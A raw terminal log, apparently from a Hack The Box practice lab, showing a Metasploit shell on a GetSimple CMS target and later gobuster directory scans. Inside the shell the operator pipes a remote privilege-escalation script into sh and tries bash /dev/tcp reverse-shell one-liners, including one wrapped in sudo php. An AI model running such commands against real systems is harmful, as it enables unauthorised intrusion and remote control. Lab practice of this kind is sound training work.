www-data@gettingstarted:/home/mrb3n$ ls
user.txt
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@192.168.78.128
ssh kali-user@192.168.78.128
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
<g/PEASS-ng/releases/latest/download/linpeas.sh | sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:-- 0curl: (6) Could not resolve host: github.com
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
<g/PEASS-ng/releases/latest/download/linpeas.sh | sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:02 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:03 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:04 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:06 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:07 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:08 --:--:- 0 0 0 0 0 0 0 0 --:--:-- 0:00:09 --:--:-- 0curl: (6) Could not resolve host: github.com
www-data@gettingstarted:/home/mrb3n$ sudo nano /etc/ssh/sshd_config
sudo nano /etc/ssh/sshd_config
[sudo] password for www-data: ^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
kali
kali
ssh: connect to host 10.10.15.44 port 22: Connection timed out
www-data@gettingstarted:/home/mrb3n$ kali
Command 'kali' not found, but can be installed with:
apt install kali
Please ask your administrator.
www-data@gettingstarted:/home/mrb3n$ ping 10.10.15.44
ping 10.10.15.44
PING 10.10.15.44 (10.10.15.44) 56(84) bytes of data.
64 bytes from 10.10.15.44: icmp_seq=1 ttl=63 time=17.7 ms
64 bytes from 10.10.15.44: icmp_seq=2 ttl=63 time=17.1 ms
64 bytes from 10.10.15.44: icmp_seq=3 ttl=63 time=17.1 ms
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
64 bytes from 10.10.15.44: icmp_seq=4 ttl=63 time=17.4 ms
64 bytes from 10.10.15.44: icmp_seq=5 ttl=63 time=16.9 ms
64 bytes from 10.10.15.44: icmp_seq=6 ttl=63 time=16.7 ms
64 bytes from 10.10.15.44: icmp_seq=7 ttl=63 time=17.6 ms
64 bytes from 10.10.15.44: icmp_seq=8 ttl=63 time=17.2 ms
^C
--- 10.10.15.44 ping statistics ---
8 packets transmitted, 8 received, 0% packet loss, time 7011ms
rtt min/avg/max/mdev = 16.675/17.226/17.736/0.329 ms
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ ssh kali-user@10.10.15.44
ssh kali-user@10.10.15.44
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
<me/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
id
id
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
<me/mrb3n$ bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
< "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1
^C
Abort session 3? [y/N] N
[*] Aborting foreground process in the shell session
^C
www-data@gettingstarted:/home/mrb3n$
www-data@gettingstarted:/home/mrb3n$ sudo /usr/bin/php -r "system("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1");"
<stem("bash -i >& /dev/tcp/10.10.15.44/4444 0>&1");"
^C
Abort session 3? [y/N] ^C
[*] 10.129.63.204 - Command shell session 3 closed. Reason: User exit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > Interrupt: use the 'exit' command to quit
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > M
[-] Unknown command: M. Run the help command for more details.
msf6 exploit(multi/http/getsimplecms_unauth_code_exec) > exit
e
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.63.204 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.63.204
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/admin (Status: 301) [Size: 314] [--> http://10.129.63.204/admin/]
/backups (Status: 301) [Size: 316] [--> http://10.129.63.204/backups/]
/data (Status: 301) [Size: 313] [--> http://10.129.63.204/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 316] [--> http://10.129.63.204/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 278]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 314] [--> http://10.129.63.204/theme/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ gobuster dir -u http://10.129.63.204/admin -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.63.204/admin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/humans.txt (Status: 200) [Size: 828]
/inc (Status: 301) [Size: 318] [--> http://10.129.63.204/admin/inc/]
/index.php (Status: 200) [Size: 2623]
/lang (Status: 301) [Size: 319] [--> http://10.129.63.204/admin/lang/]
/template (Status: 301) [Size: 323] [--> http://10.129.63.204/admin/template/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================